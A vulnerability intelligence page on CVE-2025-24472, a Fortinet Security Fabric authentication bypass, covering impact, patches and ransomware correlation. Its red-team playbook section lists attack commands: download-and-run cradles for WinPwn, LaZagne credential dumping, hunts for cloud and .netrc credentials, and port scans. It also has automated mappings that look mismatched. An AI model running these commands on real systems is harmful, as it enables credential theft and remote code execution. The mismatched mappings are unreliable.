CVE-2025-24472
Overview
This vulnerability is an authentication bypass caused by improper validation of Security Fabric proxy requests in Fortinet FortiOS and FortiProxy products. The flaw arises from the acceptance of crafted CSF proxy requests that exploit knowledge of upstream and downstream device serial numbers. The affected component is the Security Fabric integration feature, which fails to enforce proper authentication controls between devices, enabling unauthorized privilege escalation.
Vulnerability Description
An Authentication Bypass Using an Alternate Path or Channel vulnerability [CWE-288] affecting FortiOS 7.0.0 through 7.0.16 and FortiProxy 7.2.0 through 7.2.12, 7.0.0 through 7.0.19 may allow a remote unauthenticated attacker with prior knowledge of upstream and downstream devices serial numbers to gain super-admin privileges on the downstream device, if the Security Fabric is enabled, via crafted CSF proxy requests.
Impact
An attacker with prior knowledge of device serial numbers can remotely gain super-admin privileges on downstream devices within the Security Fabric, without any authentication. This enables full control over the affected device, including configuration changes, data access, and potential lateral movement within the network. The vulnerability can lead to complete system compromise and disruption of security infrastructure in environments using Fortinet Security Fabric.
Solution
Fortinet has released patches addressing this vulnerability in FortiOS starting from version 7.0.17 and FortiProxy starting from versions 7.2.13 and 7.0.20. Administrators should apply these updates promptly. Detailed patch instructions and advisory information are available at the Fortinet PSIRT page: https://fortiguard.fortinet.com/psirt/FG-IR-24-535.
EPSS vs KEV Prediction — Evolution (30 days)
Ransomware Intelligence
Correlated Groups
Correlations are established through analysis of shared tools, tactics, and infrastructure between threat groups and vulnerabilities. They do not represent direct confirmation of exploitation.
| Group | Confidence | Victims | Source |
|---|---|---|---|
|
Mora_001
|
MEDIUM | — | correlation_misp |
Predictions
Predictions are based on analysis of past ransomware group behaviors and their predilection for specific vulnerability characteristics, such as vendor, product, and flaw type.
The groups below are predictions based on historical exploitation patterns of the same vendor/product. These are not confirmations.
Full Analysis
The vulnerability in FortiOS and FortiProxy relates to an authentication bypass that exploits an alternate path or channel, specifically through crafted CSF proxy requests. This flaw allows an unauthenticated remote attacker to gain super-admin privileges on a downstream device, provided they have prior knowledge of the serial numbers of both upstream and downstream devices within a Security Fabric configuration. The critical nature of this vulnerability stems from the fact that it bypasses standard authentication mechanisms, enabling attackers to manipulate device settings and access sensitive data without legitimate credentials.
Attack vectors for this vulnerability are particularly concerning due to the ease with which an attacker can exploit it. By leveraging knowledge of device serial numbers, an attacker can craft specific requests that exploit the authentication bypass. This could occur in environments where Security Fabric is enabled, which is a common configuration for organizations utilizing Fortinet products for network security. Scenarios may include targeted attacks against organizations with poorly secured networks or those that have not implemented stringent access controls. The ability to gain super-admin privileges means that an attacker could potentially alter configurations, disable security features, or exfiltrate sensitive information, leading to significant operational disruptions.
The real-world impact of this vulnerability is substantial, particularly for businesses that rely on Fortinet's solutions for their cybersecurity infrastructure. Organizations could face severe consequences, including data breaches, unauthorized access to critical systems, and potential compliance violations. The financial implications could be dire, with costs associated with incident response, remediation, and potential legal liabilities. Additionally, the reputational damage resulting from a successful exploitation could undermine customer trust and lead to long-term business ramifications. Given the CVSS score of 8.1, this vulnerability is classified as high severity, indicating that it poses a significant risk to affected systems.
To detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, it is essential to ensure that all FortiOS and FortiProxy devices are updated to the latest versions that address this flaw. Regular patch management practices should be enforced to minimize exposure to known vulnerabilities. Additionally, network segmentation and strict access controls can help limit the potential impact of an exploitation attempt. Monitoring network traffic for unusual patterns or unauthorized access attempts can also aid in early detection of exploitation attempts. Organizations should conduct regular security assessments and penetration testing to identify and remediate vulnerabilities proactively.
In conclusion, the authentication bypass vulnerability in FortiOS and FortiProxy represents a significant threat to organizations utilizing these products. The potential for unauthorized access to super-admin privileges poses a critical risk, necessitating immediate attention from cybersecurity teams. By understanding the technical details, attack vectors, and real-world implications, organizations can better prepare their defenses and mitigate the risks associated with this vulnerability. Implementing robust detection and mitigation strategies will be essential in safeguarding sensitive information and maintaining the integrity of network security.
CSURFACE threat intelligence has identified a slight increase in detection activity related to CVE-2025-24472, indicating a modest uptick in attempts to exploit the authentication bypass vulnerability in FortiProxy environments with Security Fabric enabled. While the overall exploit landscape remains stable with no new proof-of-concept exploits emerging, the observed telemetry suggests adversaries—potentially including ransomware operators linked to the Mora_001 group—are incrementally probing this attack vector. This subtle rise in activity underscores the continuing interest in leveraging device serial number knowledge to escalate privileges remotely. For defenders, this development signals the need for heightened vigilance in monitoring proxy request anomalies and reinforces the criticality of timely patch management. Although the EPSS score remains low and stable, the increased probing activity elevates the practical risk of exploitation attempts, warranting a reassessment of threat prioritization for affected FortiProxy deployments.
Affected Products (3)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortiproxy | All |
cpe:2.3:a:fortinet:fortiproxy:*:*:*:*:*:*:*:*
|
|
|
Fortinet | Fortios | All |
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
|
Exploits
No exploits found for this CVE.
Ransomware Groups 1
Threat Feed
6 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Ransomware group known to exploit this vulnerability
Ransomware group known to exploit this vulnerability
CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
| ID | Name | ML Conf. | Likelihood | Severity | Link |
|---|---|---|---|---|---|
| CAPEC-665 | Exploitation of Thunderbolt Protection Flaws |
40%
|
Low | Very High | |
| CAPEC-127 | Directory Indexing |
30%
|
High | Medium |
Red Team Playbook
33 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2025-24472 |
| fortiguard.fortinet.com |
GitHub CVE
|
https://fortiguard.fortinet.com/psirt/FG-IR-24-535 |
| cisa.gov |
NVD API
US Government Resource
|
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-24472 |